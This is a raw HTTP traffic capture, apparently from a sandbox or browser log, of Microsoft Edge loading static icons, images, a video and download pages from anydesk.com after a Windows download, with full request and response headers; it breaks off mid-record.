x-amz-cf-id: 9qbakgoRLS7AvSt82-Go7CtY7fhapVpEW9oZxfrFVSYqAirHawtbkg==
age: 61616
GET

https://anydesk.com/_static/img/icons/android-logo-5e3c95.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/android-logo-5e3c95.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: hxQTXNB_Sdc9iNlVXeZQ65bRnEd_JYwVMQuz5wmhhLKKzH6ll8vWvw==
age: 61616
GET

https://anydesk.com/_static/img/icons/ios-logo-cb4ee2.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/ios-logo-cb4ee2.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: CFYK25a7GY1yeZ_aA3m-J5lwQ28zJQRkkaqYZwHBdHylpWqroEXMXw==
age: 61616
GET

https://www.anydesk.com/_videos/ad_getting_started.mp4

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_videos/ad_getting_started.mp4 HTTP/2.0
host: www.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://anydesk.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

content-type: video/mp4
content-length: 9082709
server: nginx
date: Fri, 04 Oct 2024 23:00:11 GMT
last-modified: Tue, 25 Apr 2023 09:37:41 GMT
etag: "64479f65-8a9755"
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-range: bytes 0-9082708/9082709
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: TrEE29VhFs53ETxjWfoUJHmW5P0r6RkF696sObLktLO5i5SC8u9OSw==
age: 61663
GET

https://anydesk.com/_static/img/icons/chrome-logo-d001ba.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/chrome-logo-d001ba.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 8PWmXSQilzKMHmxRKTxAhcwkLwuMmIjMdLgh28_hLecu62S4Llj2NQ==
age: 61621
GET

https://anydesk.com/_static/img/icons/raspberrypi-logo-5100f4.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/raspberrypi-logo-5100f4.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: qZxEAcxs5fWmpqOHx_iY6R2YmdZL2Gq4BoJWKLn2q9sPiW6bsrQUVw==
age: 61621
GET

https://anydesk.com/_static/img/icons/appletv-logo-1415b6.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/appletv-logo-1415b6.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: CA5BKi-jjXX7b2eelNwGvqqPl1nM4ZjunAJ5uxjkZvTICJK9jOlqPQ==
age: 61621
GET

https://anydesk.com/_static/img/icons/freebsd-logo-13e91e.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/freebsd-logo-13e91e.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: XXe_XBxMx8zRIEYboeM_R7ETUb6eUEg6RYCzTN7tfiL9EovS82G9ww==
age: 61621
GET

https://anydesk.com/_static/img/icons/linux-logo-39c4d2.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/linux-logo-39c4d2.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: tjwSDkmDEzpfn71mme_xXomH_xlrZWxHqBDi2W8UWW1I-f6fsCRHgg==
age: 61621
GET

https://anydesk.com/en/downloads

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /en/downloads HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: text/html;charset=UTF-8
server: nginx
date: Sat, 05 Oct 2024 08:00:07 GMT
cache-control: max-age=86400
set-cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64; Path=/; Secure; HttpOnly
content-language: en-NL
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: bAdoF_GRmDVrE5aJdAzdfAOBVx2EZKXC_1ReVHPoyNzfVDOXG0eAVA==
age: 29272
GET

https://anydesk.com/_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 5vhvdPwaWzJTMk6WY3c22ZInP1_O_x-6rinPcqNDFvx8wk4Bzi5gUA==
age: 60971
GET

https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/light/controls-play-558754.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: nFqyqnJ6YPP4gygd9ZsXmyOSn8n3iPqdrFCKbS_Xxacz2uc-83SaXg==
age: 60971
GET

https://anydesk.com/_static/icons/red/light/controls-play-c7b57a.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/light/controls-play-c7b57a.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: EF-nF51DLG-d_mkVoNavY2jHn_0pkvXs32qDyk47sLyZGjEqeNr3lA==
age: 61625
GET

https://anydesk.com/_static/img/videos/address-book-anydesk-e52bd3.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/address-book-anydesk-e52bd3.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 59_1uidRWJDTvKjVWp8p4ZR3hy4YllKbPWHyzd7LY6FcztXKFAMDfw==
age: 61625
GET

https://anydesk.com/_static/img/videos/secure-usage-anydesk-7c9605.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/secure-usage-anydesk-7c9605.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: HzLPbvzLNjwjHYCuVpZLx3Ok5B2Dl4lNblUVy0A5ds3VIRwZ6ftSGA==
age: 60971
GET

https://anydesk.com/_static/img/videos/transfer-file-anydesk-2a0ba9.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/transfer-file-anydesk-2a0ba9.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99
cookie: has_downloaded=true

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 7okg9ABFTE3feOw2cEmgjgYJma7sgx8lFJaSLoTeBlKEy4_8OMCwaQ==
age: 60971
GET

https://anydesk.com/en/downloads/windows

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /en/downloads/windows HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: gNXj6attjAwOh3f2fnt6OBFgESqp9p9O6Q0_zCBC0fwz-Cm_rK6hYw==
age: 61627
GET

https://anydesk.com/_static/icons/red/bold/keyboard-arrow-top-right-634d12.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/keyboard-arrow-top-right-634d12.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: W4XET3P2QL669H5B1LB32Vjb2Uj7_Iy5C1nxMEoHgfZK5KQTcS6hwg==
age: 61627
GET

https://anydesk.com/_static/img/devices/anydesk-device-windows-04fa31.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/devices/anydesk-device-windows-04fa31.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: text/html;charset=UTF-8
server: nginx
date: Sat, 05 Oct 2024 08:00:08 GMT
cache-control: max-age=86400
content-language: en-NL
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 8ckI2UIv_QX3HKNAz4R2vo5zWZor8_J0p23x_TL5gyIWXc3P4v2mAw==
age: 29277
GET

https://anydesk.com/_static/icons/red/bold/space-rocket-flying-99394c.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/space-rocket-flying-99394c.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: EniY2PXwBQ6ur1Jr7bcO74T2jDUIYMW6A3I0ILkWnChme-mDRG-O4Q==
age: 61627
GET

https://anydesk.com/_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg

msedge.exe

Remote address:

